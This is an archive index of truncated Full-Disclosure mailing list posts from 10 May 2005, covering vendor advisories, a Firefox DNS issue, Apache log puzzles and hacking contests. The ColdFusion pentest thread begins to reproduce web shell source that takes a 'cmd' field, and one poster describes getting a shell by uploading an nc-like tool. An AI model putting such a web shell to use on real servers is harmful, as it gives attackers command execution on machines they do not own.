[Full-disclosure] CAIF 1.2 released

2005-05-10 Thread Oliver Goebel
Dear list, for your information: The Common Announcement Interchange Format (CAIF) specification version 1.2 has been released. A new version of the draft, reflecting all the changes made has been released too. All relevant documents are available from the CAIF home page. CAIF Home: h

Re: [Full-disclosure] coldfusion pentest

2005-05-10 Thread Frederic Charpentier
Hi fatb, from securiteam web site : < html> < body> < cfoutput> < table> < form method="POST" action="cfexec.cfm"> < tr> < td>Command: < td> < input type=text name="cmd" size=50< cfif isdefined("form.cmd")> value="#form.cmd#" > < br> < tr> < td>Options: < td> < input type=text name="o

Re: [Full-disclosure] coldfusion pentest

2005-05-10 Thread Javier Reoyo
Hi fatb, this is from mailing of securiteam. Try it. ColdFusion Web Shell SUMMARY DETAILS The following source code will generate a web based shell whenever it is executed under the ColdFusion environment. Tool sou

[Full-disclosure] List Charter

2005-05-10 Thread John Cartwright
Hi FYI: I have disabled monthly password reminders due to the increasing problem of archive sites storing them verbatim without filtering. Anyone running such an archive is encouraged to change their password if necessary. A password reminder is always available via the web interface in any case

Re: [Full-disclosure] Fwd: GWAVA Sender Notification (Content filter)

2005-05-10 Thread James Tucker
marketing is a "wonderful" thing. On 5/10/05, [EMAIL PROTECTED] <[EMAIL PROTECTED]> wrote: > On Tue, 10 May 2005 02:32:41 BST, James Tucker said: > > Surely this kind of message is a really bad idea. > > You know it, I know it, and the A/V vendors know it. > > > What is the possible true busines

Re: [Full-disclosure] coldfusion pentest

2005-05-10 Thread fatb
thx :) the script from securiteam was originally from Kurt Grutzmacher; it could not run on my box, and I successfully got a working shell by uploading an nc-like tool and using the following script to run it. No matter how, I thought many guys like me need a working cf webshell, beca

Re: [Full-disclosure] Useless tidbit

2005-05-10 Thread pretty vacant
You may or may not know that Windows applications often use the registry to store information about where to find applications within their file system. Due to the way in which Windows handles filenames, situations where this information is stored in an unquoted fashion, can leave the application o

RE: [Full-disclosure] Useless tidbit (MS AntiSpyware)

2005-05-10 Thread Steven Rakick
Interesting. Has this always been that way? While it's not a huge gaping hole, it's definitely concerning. At least to me. Steve   -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]] On Behalf Of pretty vacant Sent: Tuesday, May 10, 2005 9:53 AM To: James Tucker Cc: full-

[Full-disclosure] scanning through socks or proxy

2005-05-10 Thread Matteo Giannone
Hi list, Is there any tool (win32 and/or unix) to scan through socks or proxy? Googling gives no significant results... http://teokolo.altervista.org

RE: [Full-disclosure] scanning through socks or proxy

2005-05-10 Thread Todd Towles
What are you trying to scan? Some tools have proxy support and some don't. Then you can run Proxyrama, A4Proxy, SocksChain, etc, etc. > -Original Message- > From: [EMAIL PROTECTED] > [mailto:[EMAIL PROTECTED] On Behalf > Of Matteo Giannone > Sent: Tuesday, May 10, 2005 9:49 AM > To: ful

[Full-disclosure] Firefox & Mozilla Advisory

2005-05-10 Thread P Ellison
Heads Up http://www.mozilla.org/security/announce/mfsa2005-42.html ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secu

Re: [Full-disclosure] Firefox Remote Compromise Leaked

2005-05-10 Thread Georgi Guninski
On Mon, May 09, 2005 at 03:08:33PM -0700, Eric Paynter wrote: > IE 6.x has had 80 advisories, of which 42% (34 advisories) were rated if memory serves me right, some windoze service packs drastically changed the behaviour of some private pages and emails, so number of advisories != number of fixed

Re: [Full-disclosure] Firefox & Mozilla Advisory

2005-05-10 Thread Morning Wood
wtf??? - - - - this HAS BEEN PATCHED no "heads-up" needed ( you missed the boat by a week ) BUT THANKS FOR PLAYING! - Original Message - From: "P Ellison" <[EMAIL PROTECTED]> To: Sent: Tuesday, May 10, 2005 9:21 AM Subject: [Full-disclosure] Firefox & Mozilla Advisory __

RE: [Full-disclosure] Firefox & Mozilla Advisory

2005-05-10 Thread Todd Towles
Well, the patch the mozilla server was modified to fix the issue. Paul told everyone the whole story about it on here yesterday. I heard about this on the weekend. I am surprised no one has talked about the Google DNS issue. Users were tricked into going to SoGoSearch.com because of IE's great dom

[Full-disclosure] Crash in Zoidcom 1.0 beta 4

2005-05-10 Thread Luigi Auriemma
Luigi Auriemma Application: Zoidcom http://www.zoidcom.com Versions: <= 1.0 beta 4 Platforms: Windows and Linux Bug: access to unallocated memory Exploitation: remo

Re: [Full-disclosure] Firefox & Mozilla Advisory

2005-05-10 Thread Ben Vaisvil
Engadget.com was claiming (incorrectly) that google got hacked http://64.233.167.104/search?q=cache:aAAhpPYRP5cJ:www.engadget.com/entry/1234000610042620/+engadget+google+hacked&hl=en Didn't take long for baseless speculation! Todd Towles wrote: Well, the patch the mozilla server was modified to f

[Full-disclosure] [ GLSA 200505-07 ] libTIFF: Buffer overflow

2005-05-10 Thread Sune Kloppenborg Jeppesen
Gentoo Linux Security Advisory GLSA 200505-07, http://security.gentoo.org/

[Full-disclosure] [ GLSA 200505-08 ] HT Editor: Multiple buffer overflows

2005-05-10 Thread Sune Kloppenborg Jeppesen
Gentoo Linux Security Advisory GLSA 200505-08, http://security.gentoo.org/

Re: [Full-disclosure] Firefox Remote Compromise Leaked

2005-05-10 Thread bkfsec
Mary Landesman wrote: I find security in understanding how best to secure a browser, rather than switching to whichever one advertises the least vulnerabilities regardless of how open that interpretation might be. My point is that crunching numbers reveals different results, depending solely on the

Re: [Full-disclosure] scanning through socks or proxy

2005-05-10 Thread Michael Holstein
Is there any tool (win32 and/or unix) to scan through socks or proxy? Googling gives no significant results... Sockscap (win32) will forward all normal tcp/udp traffic via a SOCKS5 proxy. www.socks.permeo.com/Download/SocksCapDownload/index.asp Cheers, ~Mike. ___

Re: [Full-disclosure] PWCK Overflow POC Code Redhat/Suse older versions or something (maybe later too)

2005-05-10 Thread Day Jay
I'm sorry for being such a bastard. After looking more into this guy's site, it looks pretty sweet. d. --- Day Jay <[EMAIL PROTECTED]> wrote: > Jesus H. Christ! > > I never "claimed" to be a master at c coding or > being > the greatest like this guy did and he *still* > hardcoded his shit and he'

RE: [Full-disclosure] Firefox & Mozilla Advisory

2005-05-10 Thread Todd Towles
I was just taking a guess at what could have happened. But it sounds like it would work. You buy www.google.com.net and then you wait for their DNS to mess up and you get thousands and thousands of hits to your spyware site. Possible Passive Pharming attack? Anyone know for sure what happened? > -

Re: [Full-disclosure] Firefox & Mozilla Advisory

2005-05-10 Thread Ben Vaisvil
Your guess is probably correct - and The Register reports about the same: http://www.theregister.co.uk/2005/05/09/google_dns_glitch/ Todd Towles wrote: I was just taking a guess at what could have happened. But it sounds like it would work. You buy www.google.com.net and then you wait for their DNS

[Full-disclosure] ThinkSECURE's AIRRAID - A WIRELESS HACKING TOURNAMENT - AUG 2005, SINGAPORE

2005-05-10 Thread [EMAIL PROTECTED]
ThinkSECURE's AIRRAID WIRELESS HACKING EVENT SUNTEC CONVENTION CENTRE, SINGAPORE AUG 26TH 2005 (TOURNAMENT) AUG 27TH 2005 (OPENHACK) Official Event Website: http://airraid.securitystartshere.net Air Raid: (noun) An attack by military aircraft, especially when armed with bombs and rockets; a

[Full-disclosure] sendmail exploit

2005-05-10 Thread migalo digalo
hi all; this is my first post in this mailing list; so please ... i am doing some pen-tests, to apply the bit of theoretical knowledge i have, and nessus shows me some 'Critical' vulnerabilities: sendmail 8.8 (http://www.iss.net/issEn/delivery/xforce/alertdetail.jsp?oid=21950) and php older than 3.0.1

Re: [Full-disclosure] KSpynix ::: the Unix version of KSpyware? (Proof Of Concept)

2005-05-10 Thread me
I totally agree with Barry. What a pathetic attempt... what for. Spyware and viri were one of the reason to switch to linux for me. I think it's kinda sad seeing people here wasting their time trying to code spyware for linux/unix. Get a life and do something constructive. my2bits me bkfsec wrot

[Full-disclosure] Another exploit against apache or kernel

2005-05-10 Thread Adrian Senn
Hello together, For some weeks we have had an intruder who is exploiting us and poisoning us with the virus Unix/RST.A. I have now found how it happens, but it isn't clear to me what he is doing. I found in the apache log file some interesting strings. Repeating entries such as this: ip-hide - - [10/May/2005:19:5

Re: [Full-disclosure] Another exploit against apache or kernel

2005-05-10 Thread Paul Schmehl
--On Tuesday, May 10, 2005 11:57:40 PM +0200 Adrian Senn <[EMAIL PROTECTED]> wrote: Since some weeks we have an intruder which is exploiting us and poisoning us with the Virus Unix/RST.A I found now how it happens at it isn't clear to me what he is doing. I found in the apache log file some intere

Re: [Full-disclosure] sendmail exploit

2005-05-10 Thread pingywon
Thank to you for tell us. ~pingywon - Original Message - From: "migalo digalo" <[EMAIL PROTECTED]> To: Sent: Tuesday, May 10, 2005 5:50 PM Subject: [Full-disclosure] sendmail exploit hi all; this my first post in this mailing list;so please ... i am doing same pen-tests ,to apply t

RE: [Full-disclosure] Useless tidbit (MS AntiSpyware)

2005-05-10 Thread Nick FitzGerald
Steven Rakick wrote: > Interesting. Has this always been that way? While it's not a huge gaping > hole, it's definitely concerning. At least to me. Well, yes, of course it's concerning... If you have some unknown/unwanted/etc program running on one of your machines you darn well should be conce

[Full-disclosure] Guesbook Pro XSS & HTML Injection

2005-05-10 Thread SoulBlack Group
Title: Guestbook PRO Vulnerability discovery: SoulBlack - Security Research - http://soulblack.com.ar Date: 10/05/2005 Severity: Medium. defacement website Affected version: <

[Full-disclosure] RE: Invitation to www.banneretcs.com Hacking Contest

2005-05-10 Thread Luke Skywalker
It's not the traditional honeypot...but it is.   Welcome to the Hack www.banneretcs.com Contest!   Starting May 2nd and going until June 8th, the server located at www.banneretcs.com will welcome hackers to attack it. If you can deface the web site or capture the "hidden" document, you win an X

Re: [Full-disclosure] KSpynix ::: the Unix version of KSpyware? (Proof Of Concept)

2005-05-10 Thread James Tucker
Firefox was safe(r) for a time, now exposure has driven it to become a viable and "timeworthy" market for the spyware and malware communities. The same will come of operating systems and any other highly pervasive applications. On 5/10/05, me <[EMAIL PROTECTED]> wrote: > I totally agree with Barry

Re: [Full-disclosure] Useless tidbit (MS AntiSpyware)

2005-05-10 Thread James Tucker
May I ask what web browser you use, if any? What about mail client? Do you read rich text and html mails in code? Do you never have to update your software? Can you reliably justify rolling out new software versions to massively time-dependent and business critical systems potentially causing as mu

[Full-disclosure] MDKSA-2005:083 - Updated ethereal packages fix multiple vulnerabilities

2005-05-10 Thread Mandriva Security Team
Mandriva Linux Security Update Advisory Package name: ethereal Advisory ID:

Re: [Full-disclosure] sendmail exploit

2005-05-10 Thread Valdis . Kletnieks
On Tue, 10 May 2005 14:50:21 PDT, migalo digalo said: > have ,and nessus show me same 'Critical' vulnerabilities: > sendmail 8.8 > (http://www.iss.net/issEn/delivery/xforce/alertdetail.jsp?oid=21950) Hint: First figure out why Nessus claimed it saw a Sendmail 8.8 - because that's well and truly

[Full-disclosure] strange stuff in apache logs

2005-05-10 Thread Julio Cesar Ody
I found some strange stuff on my apache logs. Wanted to know if any of you guys has any idea of what it is: (this is weird) 127.0.0.1 - - [13/Apr/2005:10:34:00 +1000] "\x1b[A" 501 214 "-" "-" (and this comes from my internal network) 192.168.0.251 - - [09/May/2005:15:36:13 +1000] "\x03" 501 212

Re: [Full-disclosure] strange stuff in apache logs

2005-05-10 Thread Rev. Kronovohr
bad nic, network cable, or router? strange packets come up when that's going on, which leads to weird requests such as that... On Tuesday 10 May 2005 22:31, Julio Cesar Ody sat at a computer terminal and banged out madly: > I found some strange stuff on my apache logs. Wanted to know if any of >

Re: [Full-disclosure] strange stuff in apache logs

2005-05-10 Thread Valdis . Kletnieks
On Wed, 11 May 2005 13:31:02 +1000, Julio Cesar Ody said: > 127.0.0.1 - - [13/Apr/2005:10:34:00 +1000] "\x1b[A" 501 214 "-" "-" Esc bracket A. Looks almost like somebody did a 'telnet localhost 80' to do a manual GET for testing, and forgot that arrow keys don't work in that environment... ;) >

Re: [Full-disclosure] RE: Invitation to www.banneretcs.com Hacking Contest

2005-05-10 Thread Valdis . Kletnieks
On Wed, 11 May 2005 09:09:36 +1000, Luke Skywalker said: > Starting May 2nd and going until June 8th, the server located at > www.banneretcs.com will welcome hackers to attack it. If you can > deface the web site or capture the "hidden" document, you win an X-box! OK, who's got a 0-day they're wi

Re: [Full-disclosure] Another exploit against apache or kernel

2005-05-10 Thread Frank Knobbe
On Tue, 2005-05-10 at 17:04 -0500, Paul Schmehl wrote: > SecFilterSelective THE_REQUEST "ip-hide" would stop this attack cold. Paul, I think Adrian put "ip-hide" in there to mask his server's IP address in the log. It's not part of the web request the external party made. Cheers, Frank signatu

[Full-disclosure] [USN-124-1] Mozilla and Firefox vulnerabilities

2005-05-10 Thread Martin Pitt
Ubuntu Security Notice USN-124-1 May 11, 2005 mozilla-firefox, mozilla vulnerabilities CAN-2005-1153, CAN-2005-1154, CAN-2005-1155, CAN-2005-1156, CAN-2005-1157, CAN-2005-1158, CAN-2005-1160